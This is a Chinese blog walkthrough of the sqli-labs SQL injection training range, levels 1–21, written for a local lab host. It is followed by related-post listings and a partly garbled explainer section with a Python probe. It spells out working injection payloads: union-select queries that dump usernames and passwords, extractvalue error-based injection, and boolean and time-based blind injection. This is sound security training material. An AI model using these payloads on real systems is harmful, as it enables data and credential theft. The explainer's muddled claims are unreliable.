Sql-labs-master通关攻略

已于 2023-12-08 17:39:10 修改
阅读量337 收藏 1
点赞数
CC 4.0 BY-SA版权
文章标签: sql 数据库
于 2023-12-08 11:40:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_51289292/article/details/134848395

lev-1

判断为字符型注入:

http://192.168.131.131/sqli-labs-master/Less-1/?id=-1'

判断列数为三

http://192.168.131.131/sqli-labs-master/Less-1/?id=1' order by 3--+

判断回显位置

http://192.168.131.131/sqli-labs-master/Less-1/?id=-1' union select 1,2,3--+

显示数据库名和版本

http://192.168.131.131/sqli-labs-master/Less-1/?id=-1' union select 1,database(),version()--+

显示表名

http://192.168.131.131/sqli-labs-master/Less-1/?id=-1' union select 1,group_concat(table_name),version() from information_schema.tables where table_schema=database()--+

显示user表下的字段名

http://192.168.131.131/sqli-labs-master/Less-1/?id=-1' union select 1,group_concat(column_name),version() from information_schema.columns where table_schema=database() and table_name='users'--+

显示第一栏的字段内容

http://192.168.131.131/sqli-labs-master/Less-1/?id=-1' union select 1,concat_ws('?',id,username,password),version() from security.users--+

为了简洁,接下来的关卡只显示databae(),和version内容

lev-2

判断为数字型注入

http://192.168.131.131/sqli-labs-master/Less-2/?id=-2'

后续步骤参加lev1

lev-3

数字型注入,换成了')

http://192.168.131.131/sqli-labs-master/Less-3/?id=1')

后续同lev-1

lev-4

数字型,换成了")

http://192.168.131.131/sqli-labs-master/Less-4/?id=1")

后续同lev-1

lev-5

判断为字符型注入,但是没有回显

尝试报错注入

具体原理见报错注入是什么?一看你就明白了。报错注入原理+步骤+实战案例-优快云博客

http://192.168.131.131/sqli-labs-master/Less-5/?id=1' and extractvalue(1,concat(0x5e,(select database()),0x5e))--+

lev-6

字符型注入,变成双引号

lev-7

lev-8

无回显,无报错,猜测是布尔盲注

原理:布尔盲注怎么用,一看你就明白了。布尔盲注原理+步骤+实战教程-优快云博客

利用bp抓包进行database长度爆破,可以得知长度为8

http://192.168.131.131/sqli-labs-master/Less-8/?id=1' and length(database())=1--+

利用bp抓包进行数据库名的枚举

http://192.168.131.131/sqli-labs-master/Less-8/?id=1' and ascii(substr(database(),1,1))=s--+

可以得到各个字符的ascii码值,也可使用脚本

关于bp的爆破模块的使用方法实用 | 如何利用 Burp Suite 进行密码爆破-优快云博客

lev-9

多次输入未果,判断为延时注入

http://192.168.131.131/sqli-labs-master/Less-9/?id=1' and if (length(database())=1,sleep(5),sleep(2))--+

bp抓包爆破数据库长度,对比回包的时间发现8的时间较长,可知数据库长度为5,按此方式可以得知别的信息

lev-10

sleep(5)超时报错,剩余步骤同lev-9

lev-11

这次改成post传参,步骤和lev-1一样

lev-12

还是字符型注入,这回闭合换成了")

lev-13

没有回显有报错,使用报错注入,闭合方式为')

lev-14

报错注入,闭合为"

lev-15

布尔盲注,闭合方式为单引号

lev-16

还是布尔盲注闭合方式为")

lev-17

这会提示注入密码部分,报错注入,闭合方式为单引号

lev-18-21

18user-agent注入

这里需要注意的是,17关把密码给改了,所以我们要重置数据库,恢复默认的账密,admin

19referer注入,代码同上

20cookie注入

小e爱学习
关注
sqli-labs-master靶场[超详细通关教程,通关攻略~!]
muyuchen110的博客
07-22 3305
sqli-labs-master[超详细通关教程,通关攻略~!](附解题思路及各注入方法解析)-------持续更新关卡通关教程!!!!
SQLi-labs-Master(1-22)新手通关宝典
Myosotis_LL的博客
05-18 3158
欢迎来到《SQLi-labs-Master新手通关宝典》,本宝典专为网络安全新手编写,旨在引导他们深入了解SQL注入(SQLi)这一严重的安全漏洞。SQL注入允许攻击者通过精心构造的输入来操纵数据库查询,从而获取、篡改或删除敏感数据。本篇将带领你从基础知识出发,逐步掌握SQL注入的原理、技术和防御策略。通过SQLi-labs等实验环境,你将有机会在真实场景中实践SQL注入攻击,并学习如何有效防御。无论你是开发人员、系统管理员、渗透测试人员还是网络安全爱好者,掌握SQL注入技术都将对你大有裨益。
sqli-labs-master通关(持续更新...)
weixin_54438700的博客
09-06 750
输入单引号,页面报错,爆出sql语句,考虑字符型(单引号)注入。
sqli-labs-master靶场通关
m0_75208155的博客
08-12 1943
sqli-labs-master靶场通关
Sqli-labs-master靶场之1-21关通关秘籍
m0_66241651的博客
07-03 940
此靶场就是让我们掌握sql注入的基本方法,通关秘籍来了,轻轻松松搞定!
Sql-labs 靶场搭建及通关
ming20211016的博客
11-07 3445
该语句的意思是查询information_schema数据库下的tables表里面且table_schema字段内容是security的所有table_name的内容。该语句的意思是查询information_schema数据库下的columns表里面且table_users字段内容是users的所有column_name的内。mysql_real_escape_string函数,宽字节注⼊,符号绕过,联合注⼊。没⽤禁⽤or,and,但过滤了select和union,可以⽤⼤⼩写和重写进⾏绕过。
SQL-Labs靶场“36-37”关通关教程
钟言的博客
03-19 3719
本篇为SQL-Labs靶场的36关到37关的通关教程,详细内容包含了:一、36关 GET单引号宽字节注入1、源码分析2、联合查询注入3、updatexml报错注入4、floor报错注入37关POST单引号宽字节注入1、源码分析2、联合查询注入3、updatexml报错注入4、floor报错注入等内容
Sqli-lab教程-史上最全详解(1-22通关
qq_53058639的博客
04-14 1298
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
【详细】 Sqli-labs1~65关 通关详解 解题思路+解题步骤+解析
热门推荐
Jay17的博客
08-03 4万+
【详细】 Sqli-labs1~65关 通关详解 解题思路+解题步骤+解析 详细,超级详细
sqli-labs通关详解(1-20关)
2302_81105681的博客
04-11 3651
1.首先判断闭合方式在我之前发布的文章中有详细的sql注入判断闭合的方法和原理,参考《sql注入实验原理》在1-6关,我们可以通过在参数后面加\的方法判断闭合\后面的符号就是闭合符号,由此可见第一关的闭合方式为'闭合2.判断字段数当我们输入?id=1' order by 4--+时页面显示没有第4字段,由此判断字段数为3.3.判断回显位因为有三个字段,所以我们使用命令判断出第2,3字段的内容回显在页面中4.爆数据库名我们可以将2或者3更改为database()来使页面回显出数据库名。
sqli-labs-master
08-22
sqli-labs-master是一个练习sql注入的代码环境
sqli-labs-master(Less1--Less5)
2301_81105268的博客
04-17 1310
MYSQL数据库的所有表的信息都存储在了information_schema数据库里面的tables这个表里(information_schema.tables中两列table_schema是数据库名,table_name中表名。from information_schema.tables即table_name的内容在这个数据库里的tables表里查询,并且有个条件是table_name这个表所属的数据库是security。由此可判断闭合为:')输入3显示正常,输入4报错,则判断数据库中的字段数为3。
Sqli-labs-master的环境搭建
m0_52505633的博客
04-10 2606
Sqli-libs是一位印度程序员写的,用来学习SQL注入的一个游戏教程。它是一个非常好的SQL注入学习实战平台,涵盖了报错注入、盲注、Update注入、Insert注入、Heather注入、二阶注入、绕过WAF,比较全面的一个注入平台。本次在phpstudy环境上部署sqli-labs 注入平台。 本次安装是在虚拟机中windows10安装 ----注释---- phpstudy和sqli-labs等学习环境、靶场、工具尽量安装在虚拟机中,以免某些设置、端口忘记关闭,会存在安全隐患,包括一些软件本.
sqli-labs-master靶场搭建以及报错解决
Belever的博客
04-05 2473
sqli-labs-master靶场搭建以及报错解决
sqli-labs-master第一关sql注入
m0_69550154的博客
01-29 522
id=1 and 1=1 不报错。url处先尝试着输入?通过ID数值得变动,然后判断。是否拼接,是字符型还是数字型。id=1'--+不报错。先登录账户,输入密码。
Sqli-labs-master(1-65)
kfjrlgagkogkhpa的博客
08-11 657
sqli-lab(1-65)
Sqli-labs通关教程(手工注入+工具使用sqlmap)
qq_57223070的博客
02-24 1万+
希望能帮到你,sqlmap使用及SQL注入手工
sql注入--sqli_labs_master靶场的配置
技术骨干小李的博客
07-28 491
sqli-labs-master靶场环境搭建
sqli-labs-master Less-1
Risker
04-10 1156
提示提交id值,用单引号试一下,报错:猜测id值在查询语句中被单引号包裹。接下来用order by测字段数 测出3个字段。然后看当前的数据库,构造payload:http://127.0.0.1/sqli-labs-master/Less-1/?id=1'  union select 1,1,database() %23给我返回了这个id=1的值:要执行union后的语句就要让union前的查询语...
sqli-labs-master靶场通关原理
最新发布
03-22
### sqli-labs-master 靶场通关原理与技巧 #### 1. 判断注入点和闭合方式 SQL 注入的第一步是确认是否存在可利用的注入点以及其语法结构。通过测试不同的输入来观察页面返回的结果,可以推断出 SQL 查询的具体形式及其漏洞位置。 例如,在某些情况下,可以通过简单的单引号 `'` 或双引号 `"` 来触发错误响应[^4]。如果页面返回异常,则说明可能存在未正确处理特殊字符的情况。此时可以根据返回的内容进一步分析目标系统的数据库类型、字段数量以及其他特性。 #### 2. 使用联合查询获取数据 当发现存在基于布尔型或者时间延迟类型的盲注时,可以尝试使用 UNION SELECT 方法读取额外的数据列。这种方法通常适用于能够控制整个 WHERE 子句条件的应用场景。 对于 Less-1 的例子来说,构造如下 payload 可以成功实现跨库检索并显示隐藏信息: ```http ?id=-1' union select 1,2,3 --+ ``` 此 Payload 将原本正常的 ID 参数替换成了负数加上逻辑运算符组合而成的新表达式[-1’], 并附加了一个带有三个固定数值的选择列表作为后续部分;最后再附上注释符号"--+"使得原SQL剩余片段被忽略掉从而不会影响最终执行效果[^1]. #### 3. 数据长度探测技术 为了更高效地提取敏感资料而无需逐字猜解每一个可能存在的字符串值,我们可以先测量它们各自的大小然后再逐一拆分拼接直至完全还原出来为止. 下面这个 URL 展示了如何利用 MySQL 内置函数 LENGTH() 结合 OR 连词快速定位当前所连接实例名称的实际位宽情况: ```http ?uname=a') OR LENGTH((SELECT database())) = 8# ``` 这里假设我们已经得知服务器端采用的是标准配置模式下的默认命名规则即 "test", 所以其实际存储占用空间正好等于八比特单位长度[^2]. #### 4. 错误消息解析法 有些时候即使无法直接看到预期中的反馈内容但仍有机会借助于程序崩溃产生的提示文字间接推测内部状态变化趋势进而调整策略继续深入挖掘潜在隐患所在之处. 比如当我们向系统提交参数为 '1"' 后得到类似这样的警告:"You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for right syntax near '' at line 1". 显然这表明我们的请求确实进入了后台脚本流程当中但由于缺少必要的右半边配对方才中断下来未能顺利完成全部操作过程. #### 5. XML 解析漏洞滥用案例 除了常规手段之外还有一些特殊的攻击手法值得特别关注一下——那就是针对特定扩展功能模块实施精准打击行动之一便是EXPLOITING ERROR-BASED INJECTIONS VIA EXTRACTVALUE FUNCTIONALITY UNDER CERTAIN CIRCUMSTANCES LIKE SO: Consider this request pattern designed specifically towards uncovering all available tables within a given schema named 'security': ```http ?id=1" and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e)) -- ``` Here we leverage another powerful feature provided by certain RDBMS implementations known as ExtractValue which allows us to craft complex XPath expressions inside our queries leading ultimately toward achieving similar goals mentioned earlier but through alternative pathways instead.[^3] ```python import requests def test_sql_injection(url): payloads = ["'", '"', ")"] for p in payloads: r = requests.get(f"{url}{p}") if "error" in r.text.lower(): return True return False print(test_sql_injection("http://example.com/vulnerable.php?id=")) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值